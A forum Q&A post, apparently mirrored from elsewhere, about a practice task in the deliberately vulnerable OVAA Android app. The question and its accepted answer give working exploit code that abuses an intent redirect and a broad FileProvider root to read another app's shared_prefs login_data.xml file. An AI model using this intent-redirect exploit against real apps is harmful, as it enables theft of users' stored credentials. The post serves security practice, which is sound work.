Android Fragments 泄露数据与Android内容提供商与隐式意图

kqqjbcuj  于 11个月前  发布在  Android
关注(0)|答案(1)|浏览(121)

有一个脆弱的应用程序来练习Android的安全性。Link Here我被困在它的16个使命。

16.在根条目中使用超安全的.ovaa.fileprovider内容提供程序的非常宽的文件共享声明。

我很努力地想解决它,但还是做不到。这是我的代码
MainActivity.Java

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

       Intent extra = new Intent(Intent.ACTION_VIEW);
        extra.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION );
        extra.setClassName(getPackageName(), "com.exploit.app.LeakActivity");
        extra.setType("text/xml");
        extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"));

        Intent intent = new Intent();
        intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
        intent.putExtra("redirect_intent", extra);
        startActivity(intent);
    }
}

字符串
LeakActivity.java

public class LeakActivity extends MainActivity {
        InputStream i = getContentResolver().openInputStream(getIntent().getData()); 

    public LeakActivity() throws FileNotFoundException {
    }
}


AndroidManifest.xml

<activity android:name=".MainActivity">
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
            <category android:name="android.intent.category.LAUNCHER" />
        </intent-filter>
    </activity>
    <activity android:name=".LeakActivity" />

  • 谢谢你 *
android-fragments

1条答案

按热度按时间
o2gm4chl

o2gm4chl1#

我验证了,确认下面提供的代码是为我工作:
MainActivity.java

public class MainActivity extends AppCompatActivity {
private Button button;
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    button = (Button) findViewById(R.id.button);
    button.setOnClickListener(new View.OnClickListener(){
        @Override
        public void onClick(View v){
            Intent extra = new Intent();
            extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
                    | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION
                    | Intent.FLAG_GRANT_READ_URI_PERMISSION
                    | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
            extra.setClassName(getPackageName(), "com.example.fileleaker.Leaker");
            extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/"));

            Intent intent = new Intent();
            intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
            intent.putExtra("redirect_intent", extra);
            startActivity(intent);
        }
    });
  }
}

字符串
Leaker.java

public class Leaker extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_leaker);

        Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"); // content://com.victim.provider/image/1

        try {
            InputStream i = getContentResolver().openInputStream(uri); // stolen image
            //creating an InputStreamReader object
            InputStreamReader isReader = new InputStreamReader(i);
            //Creating a BufferedReader object
            BufferedReader reader = new BufferedReader(isReader);
            StringBuffer sb = new StringBuffer();
            String str;
            while((str = reader.readLine())!= null){
                Log.v("Hello","=======File__DATA======="+str+"==========");
            }
        }catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}


AndroidManifest.xml

<activity android:name=".Leaker">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
    </intent-filter>
</activity>
<activity android:name=".MainActivity">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>

赞(0)分享  回复(0)举报  11个月前
我来回答

相关问题

    查看更多

    热门标签

    更多
    JavaquerypythonNode开发语言requestUtil数据库Table后端算法LoggerMessageElementParser

    最新问答

    更多
    • 蜀ICP备2022004421号-2 NULL123 https://www.null123.com © All rights reserved
    • 本站内容来源互联网,如果侵犯您的权益请联系我们删除, 联系方式:448109455@qq.com